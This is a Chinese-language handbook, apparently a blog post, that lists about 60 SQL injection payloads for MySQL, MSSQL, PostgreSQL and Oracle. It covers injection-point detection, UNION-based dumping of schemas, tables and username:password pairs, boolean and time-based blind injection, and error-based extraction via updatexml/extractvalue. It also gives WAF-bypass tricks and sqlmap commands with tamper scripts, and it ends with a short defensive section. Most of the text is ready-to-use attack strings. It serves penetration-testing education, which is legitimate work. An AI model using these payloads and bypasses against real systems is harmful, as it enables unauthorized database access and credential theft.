1. 项目概述一份面向实战的SQL注入Payload手册如果你正在学习网络安全或者是一名刚入行的渗透测试工程师那么“SQL注入”这个词对你来说一定不陌生。它就像网络世界里的“万能钥匙”是Web安全领域最古老、最经典也最常被利用的漏洞之一。但说实话很多新手朋友在面对一个可能存在注入的网站时常常会感到迷茫我该从哪里下手该用什么Payload为什么别人的Payload能跑出数据我的却不行这正是我整理这份《2025版渗透工程师手册60个SQL注入Payload清单集合》的初衷。这不是一份冷冰冰的命令列表而是我结合过去几年在真实渗透测试、CTF比赛以及内部靶场演练中积累的经验为你梳理的一份“从入门到精通”的实战指南。手册里的每一个Payload都不仅仅是字符串它背后对应着不同的数据库类型MySQL、MSSQL、Oracle、PostgreSQL、不同的注入场景数字型、字符型、报错型、盲注以及不同的防御绕过技巧。我的目标很简单让你拿到这份手册就能像查字典一样快速找到应对当前场景的“武器”并理解为什么这么用从而真正掌握SQL注入的精髓而不仅仅是机械地复制粘贴。2. 核心思路与Payload分类逻辑在开始罗列具体的Payload之前我们必须先理清思路。盲目地堆砌60条语句没有意义关键是要建立一个清晰的分类体系让你能根据实战中的不同“症状”快速定位到“药方”。我的分类逻辑主要基于两个维度注入点类型和利用目的。2.1 按注入点类型分类找准攻击入口这是第一步也是最重要的一步。判断错误后续所有Payload都可能无效。主要分为以下几类数字型注入注入点参数原本就是数字例如id1。这类注入通常不需要闭合引号构造起来相对简单。字符型注入注入点参数是字符串被单引号‘或双引号“包裹例如name‘admin’。这类注入需要我们先闭合前面的引号再构造Payload最后处理后面的引号有时还需要注释掉后续的SQL代码。搜索型注入常见于搜索功能参数可能被包裹在LIKE ‘%keyword%’中。注入时需要同时考虑百分号%和引号的闭合。其他类型如HTTP头注入User-Agent, Referer、Cookie注入等其本质仍是字符型或数字型只是注入的位置不同。2.2 按利用目的分类明确攻击步骤确定了入口接下来就要明确我们每一步要做什么。SQL注入攻击通常是一个循序渐进的过程探测与确认首先证明这里存在SQL注入漏洞。信息收集获取数据库名、表名、列名等结构信息。数据提取最终目标获取表中的实际数据如用户名、密码。权限提升与扩展尝试获取更高数据库权限、读写文件甚至执行系统命令。基于以上逻辑我将60个Payload分成了四大章节并在每个Payload后附上了适用场景、原理简析和注意事项确保你知其然更知其所以然。3. 基础探测与确认类Payload第1-15条这类Payload的目标是“发现漏洞”。它们通常比较简短通过触发数据库的异常行为如报错、页面内容差异、时间延迟来确认注入点是否存在以及其类型。3.1 数字型注入探测这是最简单的场景。假设原始URL为http://target.com/page.php?id1Payload 1:id1 and 11与id1 and 12原理and是逻辑与运算符。11永真12永假。如果and 11返回正常页面而and 12返回异常页面空白、错误或与原页面不同则极可能存在数字型注入。注意这是最经典的“真值假值”法。但有些网站会对所有请求返回相同页面如统一错误页此时该方法失效。Payload 2:id1与id2-1原理2-1的结果也是1。如果两个请求返回的内容相同说明参数被直接代入数学运算存在数字型注入的可能。注意这是一个很隐蔽的探测方式常用于初步试探。3.2 字符型注入探测假设原始URL为http://target.com/page.php?nameAlicePayload 3:nameAlice’ and ‘1’‘1与nameAlice’ and ‘1’‘2原理我们先闭合原SQL语句中的前引号在Alice后加‘然后插入我们的逻辑and ‘1’‘1‘。由于字符串需要引号所以我们自己补上。最终执行的SQL可能是SELECT * FROM users WHERE name‘Alice’ and ‘1’‘1’。同样通过真/假逻辑判断。注意这是字符型注入的经典手法。关键在于引号的闭合。Payload 4:nameAlice’单引号报错原理直接输入一个单引号如果网站开启了数据库错误回显可能会直接暴露出SQL语法错误信息如You have an error in your SQL syntax...。这不仅能确认注入还能获得大量信息。注意这是一种“暴力”但有效的方法。在渗透测试中如果目标环境允许报错信息是宝贵的情报来源。3.3 通用探测与注释技巧无论类型一些Payload可以帮助我们更灵活地探测。Payload 5:id1’ and sleep(5) --原理sleep(5)让数据库睡眠5秒。--是注释符在URL中常代表空格用于注释掉原SQL语句中后续的代码比如后面的引号或LIMIT子句。如果页面响应延迟了大约5秒说明注入成功且是字符型。注意sleep函数是MySQL的其他数据库有类似函数如pg_sleep(PostgreSQL)、WAITFOR DELAY(MSSQL)。--是SQL注释符在URL编码中代表空格确保注释符生效。Payload 6:id1’ and 11 #原理#是另一种SQL注释符在MySQL中常用。它的作用和--类似用于注释后续语句。注意在URL中#通常被当作锚点需要将其编码为%23才能正确传输id1‘ and 11 %23。实操心得在实际探测中我通常会按顺序尝试先简单加减运算数字型试探然后加单引号看是否报错再用and 11/and 12真值法判断。如果都不明显最后才用sleep时间盲注法因为时间延迟最可靠但也最慢、最容易被WAFWeb应用防火墙识别。同时浏览器的开发者工具Network标签和 Burp Suite 这类代理工具是观察请求与响应的利器一定要配合使用。4. 联合查询UNION信息收集Payload第16-35条确认注入点后下一步就是获取数据库结构信息。UNION SELECT是效率最高的方式但它有两个关键前提前后查询的列数必须相同以及数据类型需要兼容。4.1 判断查询列数这是使用UNION的第一步。Payload 16:id1‘ order by 1 --递增测试原理ORDER BY 1表示按第一列排序。如果该列存在页面正常。我们可以不断增加数字order by 2, order by 3...直到页面报错或返回异常。最后一个正常的数字就是当前查询的列数。注意这是最准确的方法。例如order by 5正常而order by 6错误则列数为5。Payload 17:id-1‘ union select 1,2,3 --试错法原理先将原查询条件设为不存在的值如id-1让前一个查询结果为空从而使页面直接显示我们union select的结果。我们不断尝试select 1select 1,2select 1,2,3... 直到页面正常显示数字如页面某处显示了“2”和“3”这些数字就是我们可以用来回显信息的位置。注意这种方法一举两得既判断了列数又找到了回显点。4.2 获取数据库信息找到回显点后我们就可以用这些位置替换数字爆出想要的信息。Payload 18:id-1‘ union select 1, database(), version(), user() --原理database()返回当前数据库名version()返回数据库版本user()返回当前数据库用户。这是最基础的信息收集。注意将函数放在回显点位置例如之前页面显示2和3的位置。不同数据库函数不同如MSSQL用db_name()version。Payload 19 (MySQL):id-1‘ union select 1, group_concat(schema_name), 3 from information_schema.schemata --原理information_schema.schemata表存储了所有数据库的信息。group_concat()函数将多行结果合并成一个字符串避免多次查询。注意这是获取MySQL所有数据库名的标准方法。如果数据太多group_concat可能被截断可以改用limit分页select schema_name from information_schema.schemata limit 0,1。4.3 获取表名、列名知道了数据库名接下来就是“表”和“列”。Payload 20 (MySQL):id-1‘ union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema‘数据库名’ --原理查询information_schema.tables表筛选出指定数据库table_schema下的所有表名table_name。注意‘数据库名’需要替换成上一步获取的实际名称如‘dvwa’。Payload 21 (MySQL):id-1‘ union select 1, group_concat(column_name), 3 from information_schema.columns where table_schema‘数据库名’ and table_name‘表名’ --原理查询information_schema.columns表获取指定数据库和表下的所有列名。注意这里能拿到关键表的列名比如users表下的user,password列。实操心得UNION注入非常高效但也是最容易被WAF拦截的。在实际遇到WAF时我常会尝试对UNION和SELECT进行混淆绕过比如大小写混合UnIoN SeLeCt内联注释MySQL特有/*!UNION*/ /*!SELECT*/空白符替换用/**/代替空格UNION/**/SELECT双写关键字某些简单的WAF过滤可能只替换一次关键字UNIUNIONON SELSELECTECT在被过滤掉中间的UNION和SELECT后剩下的部分又能拼成原单词。 这些技巧需要根据WAF的具体行为进行测试。5. 布尔盲注与时间盲注Payload第36-50条当页面没有明确回显既不显示数据也不报错但会根据SQL查询的真假返回不同的页面状态如“存在”与“不存在”时就是布尔盲注。如果页面状态毫无差异只能通过执行时间的长短来判断就是时间盲注。这两种方式速度慢但隐蔽性强适用场景广。5.1 布尔盲注基于页面差异的猜测其核心逻辑是构造一个条件语句如果为真页面返回A状态为假返回B状态。通过像“猜数字”一样逐位猜测数据。Payload 36:id1‘ and length(database())1 --猜数据库名长度原理length()函数返回字符串长度。我们不断改变等号右边的数字直到页面返回“真”状态即可确定长度。注意这是盲注的第一步确定目标数据的长度为后续逐字符猜测设定范围。Payload 37:id1‘ and substr(database(),1,1)‘a‘ --逐字符猜解原理substr(string, start, length)函数截取字符串。这里从第1位开始截取1个字符判断它是否等于‘a‘。我们可以遍历a-z, 0-9等字符并通过改变start参数来遍历每一位。注意这是一个极其耗时的过程通常需要借助自动化工具如sqlmap的--techniqueB参数。ascii()函数常与substr()结合使用避免引号and ascii(substr(database(),1,1))9797是‘a’的ASCII码。5.2 时间盲注基于响应延迟的猜测当页面无论真假都完全一样时我们让数据库在条件为真时“睡一会儿”。Payload 45 (MySQL):id1‘ and if(length(database())1, sleep(5), 0) --原理if(condition, true_value, false_value)函数。如果数据库名长度1这个条件为真则执行sleep(5)页面响应会延迟5秒如果为假执行0立即返回。通过观察响应时间来判断条件真假。注意时间盲注比布尔盲注更慢、更依赖网络稳定性。sleep时间不宜过长通常2-5秒即可。其他数据库有类似函数PostgreSQL的pg_sleep(5) MSSQL的WAITFOR DELAY ‘0:0:5‘。Payload 46:id1‘ and if(ascii(substr(database(),1,1))97, sleep(2), 0) --原理结合if,ascii,substr和sleep实现逐字符的时间盲注。如果数据库名第一个字符的ASCII码是97即‘a’则延迟2秒。注意这是时间盲注的核心Payload模板。自动化工具sqlmap在时间盲注模式--techniqueT下就是基于此类逻辑进行工作的。实操心得盲注是体力活手动操作几乎不可能必须依赖工具。Sqlmap是首选但理解其原理至关重要。在手动测试验证漏洞存在时我常用一个简单的延时Payload来确认时间盲注比如‘ and sleep(5) --。一旦确认就交给sqlmap并合理设置--level测试等级和--risk风险等级参数来提高效率。同时要警惕目标网站可能存在的请求频率限制过快的请求会导致IP被封锁在sqlmap中可以使用--delay参数设置请求间隔。6. 报错注入与进阶绕过Payload第51-60条报错注入是一种利用数据库执行机制故意触发错误并将查询结果隐藏在错误信息中的技术。它常用于在无法使用UNION如列数不同或盲注太慢的情况下快速获取数据。而进阶绕过则是对抗WAF和过滤机制的必备技能。6.1 报错注入从错误中“偷”数据Payload 51 (MySQL):id1‘ and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) --原理updatexml()是XML处理函数。它的第二个参数需要是合法的XPath格式。我们通过concat(0x7e, (...), 0x7e)将查询结果如select database()与非法字符~十六进制0x7e拼接导致XPath解析错误从而在报错信息中带出我们查询的结果。注意0x7e是波浪号~的十六进制常用于构造非法字符。此方法在MySQL 5.1.5以上版本有效且一次只能回显一行数据中的一个字段。Payload 52 (MySQL):id1‘ and extractvalue(1, concat(0x7e, (select database()))) --原理与updatexml类似extractvalue()也是XML函数同样利用XPath格式错误来报错回显数据。注意updatexml和extractvalue是MySQL报错注入最常用的两个函数原理相通可以互换使用。6.2 WAF与过滤绕过技巧现代应用多少都有一些防护我们需要一些“奇技淫巧”。Payload 55: 编码绕过原理对关键词进行URL编码、十六进制编码、Unicode编码等。例如UNION SELECT-U%4e%49%4f%4e %53%45%4c%45%43%54双字节URL编码SELECT-SELSELECTECT双写绕过假设过滤规则是删除SELECTadmin-0x61646d696e十六进制编码在SQL中0x开头代表十六进制字符串注意编码方式取决于WAF的检测逻辑和数据库的解析顺序。需要多次尝试。Payload 56: 等价函数/语句替换原理用功能相同的其他函数或语法替换被过滤的关键词。sleep(5)-benchmark(10000000, md5(‘test‘))通过大量运算制造延迟and-or-||-like,rlike,regexp注意这要求对SQL语法有深入了解。例如在MySQL中‘a‘ like ‘a‘等价于‘a‘‘a‘。Payload 57: 注释符混淆原理灵活使用注释符来打断WAF的检测模式。/*!50000SELECT*/MySQL中/*!...*/内的代码在指定版本号以上才会执行常用于绕过SELECT/*foobar*/username FROM users在关键词中插入无关注释注意内联注释是MySQL的特色在其他数据库中可能不适用。Payload 58: 参数污染HPP原理提交多个同名参数如?id1id2‘ union select --。不同的Web服务器/应用框架对同名参数的处理方式不同可能取第一个、最后一个或拼接可能绕过对单个参数的检查。注意这种方式比较玄学成功率取决于后端技术栈但作为一种思路值得尝试。实操心得报错注入是我的“心头好”尤其是在CTF比赛中它往往能快速打开局面。但要注意updatexml和extractvalue有长度限制MySQL默认约32KB回显过长会被截断。对于数据提取我通常会先limit 1取一条或者用substring分段截取。至于绕过没有银弹它是一个“试探-反馈-调整”的过程。我习惯先用sqlmap的tamper脚本如space2comment.py,equaltolike.py进行自动化测试同时手动尝试一些简单的编码和替换观察WAF的拦截日志如果有的话从而摸清其规则进行针对性绕过。7. 实战串联与自动化工具应用掌握了这些散装的Payload我们需要在实战中把它们串联起来。以一个经典的字符型注入为例假设目标URL是http://test.com/news.php?id‘1‘。探测确认访问news.php?id1‘ and ‘1‘‘1和news.php?id1‘ and ‘1‘‘2观察页面差异确认字符型注入。判断列数news.php?id1‘ order by 10 --逐步增加数字发现order by 5正常order by 6错误说明列数为5。寻找回显点news.php?id-1‘ union select 1,2,3,4,5 --发现页面中“2”、“4”的位置显示了数字2和4这两个位置可用于回显。获取信息数据库名news.php?id-1‘ union select 1,database(),3,4,5 --表名news.php?id-1‘ union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema‘获取的库名‘ --列名news.php?id-1‘ union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema‘库名‘ and table_name‘目标表名‘ --提取数据news.php?id-1‘ union select 1,concat(username, ‘:‘, password),3,4,5 from 目标表名 --而对于自动化Sqlmap无疑是王者。针对上述场景一个基本的命令可能是sqlmap -u “http://test.com/news.php?id1“ --batch --random-agent --level 3 --risk 2--batch非交互模式自动选择默认选项。--random-agent使用随机的User-Agent头避免被简单屏蔽。--level测试等级1-5等级越高发送的测试Payload越多越复杂。--risk风险等级1-3等级越高测试的语句可能对数据造成更大风险如INSERT。如果遇到WAF可以加上--tamper参数调用混淆脚本例如--tamperspace2comment,equaltolike。对于盲注可以指定技术--techniqueB布尔或--techniqueT时间。注意事项自动化工具虽强但绝非万能。它可能产生大量请求触发警报。在授权测试中务必控制速率--delay并最好在非业务高峰期进行。手动验证漏洞和理解原理永远是渗透测试工程师的核心能力工具只是延伸你双手的利器。8. 防御视角与总结反思作为攻击技术的总结我们必须从防御者的角度思考才算真正掌握了它。SQL注入的本质是“用户输入被当作代码执行”。因此防御的核心原则就是将数据与代码分离。使用参数化查询预编译语句这是最根本、最有效的防御手段。它让数据库预先知道SQL的结构用户输入的数据只会被当作参数处理无法改变SQL语义。在PHP中使用PDO在Java中使用PreparedStatement在Python的sqlite3或SQLAlchemy中也有对应方法。输入验证与过滤对用户输入进行严格的类型、长度、格式检查。例如ID参数必须是整数就可以在接收时强制转换为整型。但切记这只能作为辅助手段不能替代参数化查询。最小权限原则为数据库连接账户分配最小必要的权限。例如一个只用于查询的Web应用其数据库账户不应拥有DROP、FILE、EXECUTE等高级权限。这样即使发生注入危害也能被限制。避免动态拼接SQL这是万恶之源。尽量不要使用字符串拼接的方式构造SQL语句。使用Web应用防火墙WAFWAF可以过滤常见的恶意Payload作为一道额外的防线。但它可能被绕过不能作为唯一的防御措施。回顾这60个Payload它们像一套组合拳应对着不同的场景和防御。从基础的探测到联合查询的信息收集再到需要耐心的盲注以及巧妙利用数据库特性的报错注入最后是矛与盾博弈的绕过技巧。掌握它们不是为了破坏而是为了更深刻地理解漏洞的成因与危害从而能够更好地进行安全评估、漏洞挖掘与修复。真正的精通是知道如何攻更知道为何这样能攻以及如何守。这份手册希望能成为你通往“精通”之路上一份扎实的参考资料。在实战中最宝贵的永远是具体问题具体分析的能力以及那份不断尝试、深入探究的好奇心。